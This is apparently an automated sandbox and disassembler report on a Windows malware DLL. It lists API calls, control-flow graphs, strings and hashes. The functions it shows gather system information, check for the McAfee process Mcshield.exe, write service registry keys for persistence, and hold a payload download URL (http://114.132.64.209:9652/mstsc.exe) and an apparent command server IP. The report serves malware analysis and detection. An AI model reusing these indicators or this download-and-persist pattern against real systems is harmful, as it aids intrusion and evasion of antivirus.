                                • API ID: FileSleep$_memset$CloseHandleNameObjectSingleThreadWait_sprintf$CurrentExecuteModulePriorityProcessShelllstrcat$AttributesClassCopyCtrlDispatcherEnvironmentExitLibraryMessagePathServiceStartVersion$AddressChangeDefineDeviceDownloadExpandFolderFreeInputLoadNotifyPostProcShortSpecialStateStringsVariable__flsbuf__output_llstrlenwsprintf
                                • String ID: %ProgramFiles%\$%s$%s$%s\%s$??$C:\mstsc.exe$Conn$Crprosc.exe$Default$Gnzxce ohzffdbskdojcezukd$Rsymwe miusskwq$RtlGetNtVersionNumbers$Ugkwas muqmoomc$\$agmk$c:\mstsc.exe$ectG$http://114.132.64.209:9652/mstsc.exe$is2$is2$ntdll.dll$open$roup
                                • API String ID: 1571526895-699679802
                                • Opcode ID: 1a18685f6c0e5243d1546a2be70831add43371ca850183f57bb5dcf38a5c7822
                                • Instruction ID: ee04647fadb99b2ab57c91edf2c56e09fa33282c989707f0a5019d73938c408c
                                • Opcode Fuzzy Hash: 1a18685f6c0e5243d1546a2be70831add43371ca850183f57bb5dcf38a5c7822
                                • Instruction Fuzzy Hash: CFE1D271984219BBF711DBA08C86FDE7778EF05741F148184F704AE0D1DBB1A7888BA9

                                Control-flow Graph

                                APIs
                                • _memset.LIBCMT ref: 1000317A
                                • lstrcpyA.KERNEL32(?,Rsymwe miusskwq,00000000,00000000,00000000), ref: 1000319B
                                  • Part of subcall function 10002880: _memset.LIBCMT ref: 10002895
                                  • Part of subcall function 10002880: _memset.LIBCMT ref: 100028A8
                                  • Part of subcall function 10002880: wsprintfA.USER32 ref: 100028FF
                                • lstrlenA.KERNEL32(?), ref: 100031E4
                                • lstrcpyA.KERNEL32(?,Default), ref: 100031F6
                                • lstrlenA.KERNEL32(?), ref: 100031FF
                                • lstrcpyA.KERNEL32(?,Default), ref: 10003218
                                • lstrlenA.KERNEL32(?), ref: 10003251
                                • gethostname.WS2_32(?,00000100), ref: 10003263
                                • lstrlenA.KERNEL32(?), ref: 10003270
                                • getsockname.WS2_32(?,?,?), ref: 10003296
                                • GetVersionExA.KERNEL32(?), ref: 100032CB
                                • LoadLibraryW.KERNEL32(ntdll.dll), ref: 100032D6
                                • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 100032E8
                                • FreeLibrary.KERNEL32(00000000), ref: 10003314
                                • RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,10003A25), ref: 10003333
                                • RegQueryValueExA.KERNEL32(10003A25,~MHz,00000000,?,?,?), ref: 10003350
                                • RegCloseKey.ADVAPI32(10003A25), ref: 1000335A
                                • GetSystemInfo.KERNEL32(?), ref: 10003383
                                • wsprintfA.USER32 ref: 100033A2
                                • wsprintfA.USER32 ref: 100033BB
                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 100033D1
                                • GetDriveTypeA.KERNEL32(?), ref: 10003414
                                • GetDiskFreeSpaceExA.KERNEL32(?,?,?,?), ref: 1000342B
                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 10003465
                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 10003478
                                • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 10003486
                                • FreeLibrary.KERNEL32(00000000), ref: 1000349E
                                • _memset.LIBCMT ref: 100034BA
                                • GetLastInputInfo.USER32(?), ref: 100034DF
                                • GetTickCount.KERNEL32 ref: 100034E5
                                • lstrlenA.KERNEL32(?), ref: 1000353A
                                • lstrcpyA.KERNEL32(?,100154C0), ref: 1000354C
                                • lstrlenA.KERNEL32(?), ref: 10003559
                                • lstrcpyA.KERNEL32(?,1001B298), ref: 10003567
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$lstrcpy$Library_memset$AddressFreeProcwsprintf$InfoLoad$CloseCountDiskDriveGlobalInputLastMemoryOpenQuerySpaceStatusSystemTickTypeValueVersiongethostnamegetsockname
                                • String ID: :\$@$Conn$ConnectGroup$Default$GetCurrentProcess$HARDWARE\DESCRIPTION\System\CentralProcessor\0$IsWow64Process$Rsymwe miusskwq$RtlGetNtVersionNumbers$V5.2$ectGH$ectGH$kernel32.dll$ntdll.dll$roup$~MHz
                                • API String ID: 2958515878-13204464
                                • Opcode ID: 258096f66b05e43127598ddc2e4c5d146bfc97f07bf22fd6c4a8bcc2deff1001
                                • Instruction ID: 86dd26f354126c547eec35a9aabea4f79d3e9db94710c872dbb6ca73319cdd3c
                                • Opcode Fuzzy Hash: 258096f66b05e43127598ddc2e4c5d146bfc97f07bf22fd6c4a8bcc2deff1001
                                • Instruction Fuzzy Hash: C4C12D71C0022AEBDB15DBA4CC84FDEB7B8FF48305F048599E609AB145DB759A84CFA4

                                Control-flow Graph

                                APIs
                                • _memset.LIBCMT ref: 10002F82
                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00000000), ref: 10002F8F
                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 10002FA3
                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 10002FAD
                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 10002FB8
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10002FC1
                                • Process32First.KERNEL32(00000064,00000128), ref: 1000300B
                                • lstrcmpiA.KERNEL32(10015D8C,?), ref: 1000301A
                                • Process32Next.KERNEL32(00000064,00000128), ref: 1000302F
                                • lstrcatA.KERNEL32(00000000,10015D80), ref: 1000304A
                                • lstrcatA.KERNEL32(00000000,10015500), ref: 10003052
                                • CloseHandle.KERNEL32(00000000), ref: 1000308D
                                • lstrlenA.KERNEL32(00000000), ref: 10003097
                                • lstrcpyA.KERNEL32(00000000,-/-), ref: 100030A7
                                • FreeLibrary.KERNEL32(00000000), ref: 100030B2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryProcess32lstrcat$CloseCreateFirstFreeHandleLoadNextSnapshotToolhelp32_memsetlstrcmpilstrcpylstrlen
                                • String ID: -/-$CreateToolhelp32Snapshot$Mcshield.exe$Process32First$Process32Next$kernel32.dll
                                • API String ID: 2012933089-502385500
                                • Opcode ID: 77d9a14c7dcbab4dedfff160db95e2ddfaba5474e5ee06485e0b26ebcf06ac81
                                • Instruction ID: 438dffa5c89042c2c7b7eb7973dcdc7bf7f60bc86cb5373b93346d6ba129bc50
                                • Opcode Fuzzy Hash: 77d9a14c7dcbab4dedfff160db95e2ddfaba5474e5ee06485e0b26ebcf06ac81
                                • Instruction Fuzzy Hash: 6D028CB08062A9DADB60CF51D8856CEBB75FB05302FD841C9914A7F210CBBB8AC0CF95

                                Control-flow Graph

                                APIs
                                • SetLastError.KERNEL32(000000C1), ref: 006D15ED
                                • SetLastError.KERNEL32(000000C1), ref: 006D160C
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast
                                • String ID:
                                • API String ID: 1452528299-0
                                • Opcode ID: 4245b083ead44ab56f31df6103209135d6329a7d3455c68c90490f6dbbdeb9b5
                                • Instruction ID: 7db6fbcf16c23f8b0bccf1d80ec5631d6f4c7299ce85a3aa79121dacdb5dffab
                                • Opcode Fuzzy Hash: 4245b083ead44ab56f31df6103209135d6329a7d3455c68c90490f6dbbdeb9b5
                                • Instruction Fuzzy Hash: EA41A772B00600AFD720EFA8EC45F6677E9EB49711F00455AF909DB391E7B0D9018B95

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 122 75a390-75a3c8 GetSysColor 123 75a3df 122->123 124 75a3ca-75a3d4 GetSysColor 122->124 126 75a3e6-75a3fc GetSysColor 123->126 124->123 125 75a3d6-75a3dd 124->125 125->126 127 75a416 126->127 128 75a3fe-75a40b GetSysColor 126->128 130 75a41d-75a5f2 call 71cb60 call 7184d0 GetSysColor * 21 127->130 128->127 129 75a40d-75a414 128->129 129->130 135 75a5f4-75a618 130->135 136 75a61a-75a635 GetSysColor 130->136 137 75a63c-75a647 GetSysColorBrush 135->137 136->137 138 75a64a-75a65d 137->138 139 75a673-75a677 138->139 140 75a65f-75a670 call 71f2e0 138->140 142 75a67e-75a680 139->142 143 75a679 call 6f1e50 139->143 140->139 147 75a672 140->147 142->138 146 75a682-75a68d GetSysColorBrush 142->146 143->142 148 75a690-75a6a3 146->148 147->139 149 75a6a5-75a6b6 call 71f2e0 148->149 150 75a6b9-75a6bd 148->150 149->150 158 75a6b8 149->158 151 75a6c4-75a6c6 150->151 152 75a6bf call 6f1e50 150->152 151->148 155 75a6c8-75a6d3 GetSysColorBrush 151->155 152->151 157 75a6d6-75a6e9 155->157 159 75a6ff-75a703 157->159 160 75a6eb-75a6fc call 71f2e0 157->160 158->150 162 75a705 call 6f1e50 159->162 163 75a70a-75a70c 159->163 160->159 167 75a6fe 160->167 162->163 163->157 166 75a70e-75a887 call 71d260 call 717be0 call 71d260 call 717be0 call 71d260 call 717be0 call 71d260 call 717be0 call 71d260 call 717be0 call 71d260 call 717be0 call 71d260 call 717be0 call 71d260 call 717b30 call 71d260 call 717b30 call 71d260 call 717b30 call 718470 163->166 210 75a897-75a8a1 166->210 211 75a889-75a892 call 71d260 166->211 167->159 213 75a8a7-75a981 call 717be0 210->213 214 75a983-75a994 call 718470 call 75ab80 210->214 211->210 220 75aa02-75aa2f call 7a5b10 call 71cc50 213->220 223 75a997-75a9a7 214->223 225 75a9bd-75a9c1 223->225 226 75a9a9-75a9ba call 71f2e0 223->226 230 75a9c3 call 6f1e50 225->230 231 75a9c8-75a9ca 225->231 226->225 235 75a9bc 226->235 230->231 231->223 234 75a9cc-75a9fd call 717d80 call 71d190 call 717c40 call 717de0 231->234 234->220 235->225
                                APIs
                                • GetSysColor.USER32(00000016), ref: 0075A3BD
                                • GetSysColor.USER32(0000000F), ref: 0075A3CC
                                • GetSysColor.USER32(00000015), ref: 0075A3F4
                                • GetSysColor.USER32(0000000F), ref: 0075A400
                                • GetSysColor.USER32(0000000F), ref: 0075A44F
                                • GetSysColor.USER32(00000010), ref: 0075A46C
                                • GetSysColor.USER32(00000015), ref: 0075A489
                                • GetSysColor.USER32(00000016), ref: 0075A4A6
                                • GetSysColor.USER32(00000014), ref: 0075A4C3
                                • GetSysColor.USER32(00000012), ref: 0075A4E0
                                • GetSysColor.USER32(00000011), ref: 0075A4FD
                                • GetSysColor.USER32(00000006), ref: 0075A50B
                                • GetSysColor.USER32(0000000D), ref: 0075A519
                                • GetSysColor.USER32(0000000E), ref: 0075A527
                                • GetSysColor.USER32(00000005), ref: 0075A535
                                • GetSysColor.USER32(00000008), ref: 0075A552
                                • GetSysColor.USER32(00000009), ref: 0075A560
                                • GetSysColor.USER32(00000007), ref: 0075A56E
                                • GetSysColor.USER32(00000002), ref: 0075A57C
                                • GetSysColor.USER32(00000003), ref: 0075A58A
                                • GetSysColor.USER32(0000001B), ref: 0075A598
                                • GetSysColor.USER32(0000001C), ref: 0075A5A9
                                • GetSysColor.USER32(0000000A), ref: 0075A5BA
                                • GetSysColor.USER32(0000000B), ref: 0075A5CB
                                • GetSysColor.USER32(00000013), ref: 0075A5DC
                                • GetSysColor.USER32(0000001A), ref: 0075A61C
                                • GetSysColorBrush.USER32(00000010), ref: 0075A63E
                                • GetSysColorBrush.USER32(00000014), ref: 0075A684
                                • GetSysColorBrush.USER32(00000005), ref: 0075A6CA
                                  • Part of subcall function 006F1E50: __CxxThrowException@8.LIBCMTD ref: 006F1E66
                                  • Part of subcall function 00717B30: CreatePen.GDI32(00000000,?,00000001), ref: 00717B45
                                  • Part of subcall function 0071D260: DeleteObject.GDI32(00000000), ref: 0071D27F
                                  • Part of subcall function 0075AB80: _memset.LIBCMT ref: 0075ABA6
                                  • Part of subcall function 0075AB80: GetSysColor.USER32(00000014), ref: 0075AC2B
                                  • Part of subcall function 0075AB80: CreateDIBitmap.GDI32(00000000,00000028,00000004,00000001,00000028,00000000), ref: 0075ACCD
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0075A9CF
                                • std::bad_exception::~bad_exception.LIBCMTD ref: 0075A9FD
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Color$Brush$CreateMessageProcessorVirtual$BitmapConcurrency::DeleteException@8ObjectPeekPostQuitRootRoot::Throw_memsetstd::bad_exception::~bad_exception
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobals.cpp
                                • API String ID: 3116394900-594817827
                                • Opcode ID: 252dc680b15711927790b7e1c764f6a841baf6dd1d0896df4453357ae11de568
                                • Instruction ID: 6cc2b3fbb014b23fedd823b68d80197ffbfd0aca52acc66f64f8436115b519e7
                                • Opcode Fuzzy Hash: 252dc680b15711927790b7e1c764f6a841baf6dd1d0896df4453357ae11de568
                                • Instruction Fuzzy Hash: B1224E74A04208DFDB14DFA8C999BADB7B1FF48304F244228E905AB381DB78AD46DF51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 264 100073f0-100074ab call 10008310 * 2 LoadLibraryA GetProcAddress * 5 RegOpenKeyExA 269 100074b9-100074bd 264->269 270 100074ad-100074b4 264->270 271 1000760b-10007619 call 10007639 269->271 272 100074c3-100074ca 269->272 270->271 280 10007622-10007635 271->280 281 1000761b-1000761c FreeLibrary 271->281 272->271 274 100074d0 272->274 274->271 276 100074d7-100074fb RegQueryValueExA 274->276 277 10007517-1000753b 274->277 278 1000759a-100075bb 274->278 279 100075cc-100075ec 274->279 276->271 282 10007501-10007512 lstrcpyA 276->282 277->271 288 10007541 277->288 278->271 287 100075bd-100075ca 278->287 279->271 289 100075ee-100075fa 279->289 281->280 284 10007604 282->284 284->271 290 100075fb-10007601 wsprintfA 287->290 291 10007547-1000754a 288->291 289->290 290->284 292 10007587-10007598 lstrcpyA 291->292 293 1000754c-10007585 call 10007380 * 2 call 100073c0 291->293 292->284 293->291
                                APIs
                                • _memset.LIBCMT ref: 1000742B
                                • _memset.LIBCMT ref: 1000743E
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,000003FF,00000000,75921760), ref: 1000744B
                                • GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 10007462
                                • GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 1000746C
                                • GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 10007477
                                • GetProcAddress.KERNEL32(00000000,RegEnumKeyExA), ref: 1000747F
                                • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10007487
                                • RegOpenKeyExA.KERNEL32(00000000,00000000,00000000,00020019,10002922,?,?,?,000003FF,00000000,75921760), ref: 100074A6
                                • FreeLibrary.KERNEL32(00000000,?,?,?,000003FF,00000000,75921760), ref: 1000761C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Library_memset$FreeLoadOpen
                                • String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
                                • API String ID: 1147260557-2913591164
                                • Opcode ID: 3e7048359d10bc38acb5ffb903c69a20f51429f6dac3a39b980a7ee1718e9d73
                                • Instruction ID: 2b4c687773b392d40f7c1e09170f5d5da6ecb354bac96dcce8a90c3e2f23d81d
                                • Opcode Fuzzy Hash: 3e7048359d10bc38acb5ffb903c69a20f51429f6dac3a39b980a7ee1718e9d73
                                • Instruction Fuzzy Hash: D0613FB2900619ABEB10DF94CC85FEF77B8FB48744F104549FA09A7184D779EA45CBA0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 300 100076b0-1000773e LoadLibraryA GetProcAddress * 6 301 10007744 300->301 302 10007835-10007843 call 10007863 300->302 301->302 303 100077e0-100077f7 301->303 304 10007773-1000778a RegOpenKeyExA 301->304 305 10007806-1000781d 301->305 306 100077ca-100077de 301->306 307 1000774b-1000776d RegCreateKeyExA 301->307 308 100077ad-100077c8 lstrlenA RegSetValueExA 301->308 317 10007845-10007846 FreeLibrary 302->317 318 1000784c-1000785f 302->318 303->302 320 100077f9-10007804 303->320 304->302 310 10007790-10007799 304->310 305->302 321 1000781f-10007826 305->321 311 1000782a-1000782c 306->311 307->302 307->304 308->311 310->302 314 1000779f-100077a6 310->314 311->302 315 1000782e 311->315 314->302 314->306 314->308 315->302 317->318 320->311 321->311
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,75920F00,\Services\%s,75921760,100090A8,10018BD0,000000FF), ref: 100076DF
                                • GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 100076F6
                                • GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10007701
                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000770C
                                • GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10007717
                                • GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10007722
                                • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000772C
                                • RegCreateKeyExA.KERNEL32(?,00000001,00000000,00000000,00000000,000F003F,00000000,100056AD,?), ref: 10007768
                                • RegOpenKeyExA.KERNEL32(?,00000001,00000000,0002001F,100056AD), ref: 10007786
                                • lstrlenA.KERNEL32(80000002), ref: 100077B1
                                • RegSetValueExA.KERNEL32(100056AD,?,00000000,?,80000002,00000001), ref: 100077C5
                                • FreeLibrary.KERNEL32(00000000), ref: 10007846
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Library$CreateFreeLoadOpenValuelstrlen
                                • String ID: ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA$\Services\%s
                                • API String ID: 3458221994-3036171793
                                • Opcode ID: 82238496318437793409e015f464144c4ed04d03f099d37109a0536303596437
                                • Instruction ID: 335672b6f16d33e0bfe70f1d8423d15009ede123d7d04b5f674b2ff22d3e89c9
                                • Opcode Fuzzy Hash: 82238496318437793409e015f464144c4ed04d03f099d37109a0536303596437
                                • Instruction Fuzzy Hash: D651EC71940219BBEB04DFA5CC88FAE77B9FB48750F108119FA15A7185EB79A901CBA0

                                Control-flow Graph

                                APIs
                                • _memset.LIBCMT ref: 100035F0
                                • wsprintfA.USER32 ref: 1000364D
                                • GetLocalTime.KERNEL32(?), ref: 10003656
                                • _memset.LIBCMT ref: 10003671
                                • wsprintfA.USER32 ref: 100036B5
                                • lstrlenA.KERNEL32(00000000,00000000), ref: 100036D5
                                  • Part of subcall function 100076B0: LoadLibraryA.KERNEL32(ADVAPI32.dll,75920F00,\Services\%s,75921760,100090A8,10018BD0,000000FF), ref: 100076DF
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 100076F6
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10007701
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000770C
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10007717
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10007722
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000772C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$_memsetwsprintf$LibraryLoadLocalTimelstrlen
                                • String ID: %.2d$%4d-$-%.2$EM\C$MarkTime$SYST$\Ser$d$lSet$ntCo$ntro$s\%s$urre$vice
                                • API String ID: 1822092002-1355323010
                                • Opcode ID: 478a6f796c4ec48fcfc211c43f8303cac56d68805666bb2f69786ae6d530c037
                                • Instruction ID: 628c409f767abf7d13b0552e17a024748b401ed19e258ba23b456a805c41e35f
                                • Opcode Fuzzy Hash: 478a6f796c4ec48fcfc211c43f8303cac56d68805666bb2f69786ae6d530c037
                                • Instruction Fuzzy Hash: 913170B1C00268EADB55CFC4CD95BEEBBB8FB48702F104189F5497A284E7741A84CFA1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 330 100037b0-10003811 call 100082e0 wsprintfA CreateMutexA 333 10003813-1000381e GetLastError 330->333 334 10003835-10003858 call 100035d0 call 10001430 330->334 333->334 335 10003820-10003830 ReleaseMutex CloseHandle call 1000860d 333->335 341 10003887-1000388e 334->341 342 1000385a-10003882 call 100060f0 call 10006120 call 100060a0 334->342 335->334 343 10003894 341->343 344 10003aba-10003ac2 call 100014f0 341->344 342->341 346 100038a0-100038c4 call 10008310 343->346 353 10003a73-10003a94 call 10001630 344->353 357 10003971-10003984 lstrcatA 346->357 358 100038ca-10003904 call 10008310 * 2 call 10008670 346->358 361 1000398a-1000398f 357->361 358->361 378 1000390a-1000393d call 10008f90 call 10008e60 call 10008f90 358->378 363 10003995-10003999 361->363 365 100039b5-100039b7 363->365 366 1000399b-1000399d 363->366 367 100039ba-100039bc 365->367 369 100039b1-100039b3 366->369 370 1000399f-100039a5 366->370 371 100039c2-100039de GetTickCount call 10001c40 367->371 372 10003aad-10003ab4 367->372 369->367 370->365 374 100039a7-100039af 370->374 371->372 379 100039e4-10003a2a GetTickCount call 10006050 call 10001620 call 10003160 371->379 372->344 372->346 374->363 374->369 391 10003940-10003948 378->391 394 10003a36-10003a51 WaitForSingleObject Sleep 379->394 395 10003a2c-10003a34 call 100014f0 379->395 391->391 393 1000394a-1000396f lstrcatA call 10008e4e 391->393 393->361 398 10003a53-10003a5a 394->398 399 10003a95-10003a9c 394->399 402 10003a9e-10003aa8 call 100060a0 395->402 398->394 400 10003a5c-10003a6e call 100014f0 call 100060a0 398->400 399->400 399->402 400->353 402->372
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$Mutex_strcspn$CloseCreateErrorHandleLastRelease_doexitlstrcatwsprintf
                                • String ID: %s:%d:%s$119.91.152.151$Rsymwe miusskwq
                                • API String ID: 3237054141-3485276656
                                • Opcode ID: 87124a54477ad52bd00d5ca00c5270c5bf1718375538de28e08a25b5b637d4fb
                                • Instruction ID: f744732d9c017b50255b7640107bad3d276d85fd2a9b90d38a63e6466de66d70
                                • Opcode Fuzzy Hash: 87124a54477ad52bd00d5ca00c5270c5bf1718375538de28e08a25b5b637d4fb
                                • Instruction Fuzzy Hash: 73812435804265EAFB12DBA0CC95BDF77B8EF06380F008195F5496B185EB31AB48CBA1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 408 10002720-10002793 LoadLibraryA GetProcAddress * 3 LoadLibraryA GetProcAddress CoInitialize 410 10002795-1000279d 408->410 411 1000279e-100027af 408->411 412 100027b4-100027b6 411->412 412->410 413 100027b8-100027da 412->413 416 10002859-10002864 413->416 417 100027dc 413->417 421 10002866-10002867 FreeLibrary 416->421 422 10002869-1000286b 416->422 418 100027e0-100027fa 417->418 423 10002832-10002854 418->423 424 100027fc-1000281d 418->424 421->422 425 10002870-10002879 422->425 426 1000286d-1000286e FreeLibrary 422->426 423->418 432 10002856 423->432 429 10002827-1000282f 424->429 430 1000281f-10002823 424->430 426->425 429->423 430->429 432->416
                                APIs
                                • LoadLibraryA.KERNEL32(Ole32.dll,00000000,759232F0,00000001,?,?,?,?,?,?,?,?,?,?,?,1000345A), ref: 10002734
                                • GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 10002744
                                • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 1000274F
                                • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 1000275A
                                • LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,1000345A), ref: 10002764
                                • GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 1000276E
